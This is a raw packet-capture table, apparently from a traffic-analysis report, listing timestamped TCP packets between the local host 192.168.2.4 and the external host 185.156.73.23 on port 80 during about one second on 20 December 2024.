                                                                              Dec 20, 2024 16:28:18.506177902 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:18.626163006 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.232727051 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.232847929 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.232997894 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.233047009 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.233113050 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.233125925 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.233159065 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.234076023 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.234143972 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.234252930 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.234301090 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.234988928 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.235042095 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.235100031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.235146046 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.238801956 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.238820076 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.238832951 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.238843918 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.238857031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.238869905 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.238915920 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.238950014 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.238993883 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.239551067 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.239604950 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.239736080 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.239783049 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.239865065 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.239877939 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.239916086 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.240437031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.240492105 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.240735054 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.240792990 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.241286039 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.241344929 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.241404057 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.241455078 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.242261887 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.242314100 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.242453098 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.242505074 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.243208885 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.243264914 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.243289948 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.243328094 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.312599897 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.312772036 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.312849045 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.312861919 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.312903881 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.312932968 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.312973022 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.313013077 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.313852072 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.313903093 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.314182997 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.314229012 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.314635038 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.314681053 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.314755917 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.314821005 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.316940069 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.316953897 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.316967010 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.316981077 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.317019939 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.317081928 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.317405939 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.317450047 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.317800999 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.317893982 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.318536043 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.318586111 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.318706036 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.318752050 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.319680929 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.319740057 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.319811106 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.319855928 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.320101023 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.320152998 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.320219040 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.320261955 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.321289062 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.321335077 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.321455002 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.321496964 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.322174072 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.322257042 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.322318077 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.322449923 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.322829962 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.322886944 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.322927952 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.322988987 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.324067116 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.324131012 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.324573994 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.324626923 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.324934006 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.324947119 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.324994087 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.325592041 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.325678110 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.325768948 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.326514006 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.326574087 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.327150106 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.327203035 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.327655077 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.327702999 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.328166962 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.328222036 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.328288078 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.328340054 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.328901052 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.328959942 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.329258919 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.329307079 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.329433918 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.329487085 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.330262899 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.330315113 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.330387115 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.330435038 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.331223011 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.331285954 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.331546068 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.331595898 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.332032919 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.332083941 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.332552910 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.332604885 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.332974911 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.333023071 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.333189011 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.333245993 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.333780050 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.333834887 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.334255934 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.334335089 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.334836006 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.334887981 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.335340977 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.335386992 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.390364885 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.390448093 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.390494108 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.390523911 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.390949011 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.391015053 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.391264915 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.391349077 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.391856909 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.391894102 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.391915083 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.391942978 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.392756939 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.392833948 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.392848015 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.392895937 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.393605947 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.393662930 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.393763065 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.393826008 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.394606113 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.394665956 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.394740105 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.394810915 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.395390987 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.395472050 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.395526886 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.395577908 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.396356106 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.396428108 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.396501064 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.396564960 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.397345066 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.397433043 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.397936106 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.398010015 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.398077965 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.398135900 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.398653984 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.398735046 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.399113894 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.399147987 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.399208069 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.399981022 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.400058985 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.400348902 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.400413036 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.400979042 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.401052952 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.401331902 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.401395082 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.401971102 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.402004957 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.402043104 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.402089119 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.402834892 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.402961969 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.425180912 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.425216913 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.425252914 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.425303936 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.425386906 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.425436020 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.425525904 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.425585032 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.425654888 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.425717115 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.426599979 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.426670074 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.426768064 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.426830053 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.427531958 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.427594900 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.427993059 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.428055048 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.428253889 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.428309917 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.428744078 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.428908110 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.429451942 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.429522991 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.429965019 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.430025101 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.430310011 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.430370092 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.430479050 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.430531979 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.430994034 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.431066036 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.431242943 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.431303978 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.432080030 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.432142973 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.432245016 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.432302952 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.432950020 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.433010101 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.433126926 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.433190107 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.433757067 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.433825016 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.433880091 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.433950901 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.434659958 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.434741974 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.434902906 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.434961081 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.435806036 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.435869932 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.503732920 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.503776073 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.503892899 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.503918886 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.504071951 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.504122972 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.504446983 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.504499912 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.504975080 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.505031109 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.505064964 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.505111933 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.505817890 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.505870104 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.506733894 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.506757021 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.506788969 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.506808996 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.506899118 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.506949902 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.507600069 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.507652998 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.508527040 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.508547068 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.508582115 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.508599997 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.508716106 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.508769035 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.509464025 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.509516954 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.509542942 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.509592056 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.510344982 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.510401964 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.510484934 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.510528088 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.511301994 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.511363029 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.511403084 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.511456013 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.512243032 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.512300968 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.512329102 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.512383938 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.513231993 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.513266087 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.513298988 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.513326883 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.513997078 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.514064074 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.514138937 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.514194965 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.514970064 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.515059948 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.515089989 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.515163898 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.515844107 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.515912056 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.515940905 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.515990019 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.516736031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.516802073 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.516859055 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.516911030 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.517791986 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.517858982 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.517927885 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.518053055 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.518683910 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.518755913 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.518825054 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.518882036 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.519527912 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:19.519591093 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:19.519757032 CET8049730185.156.73.23192.168.2.4
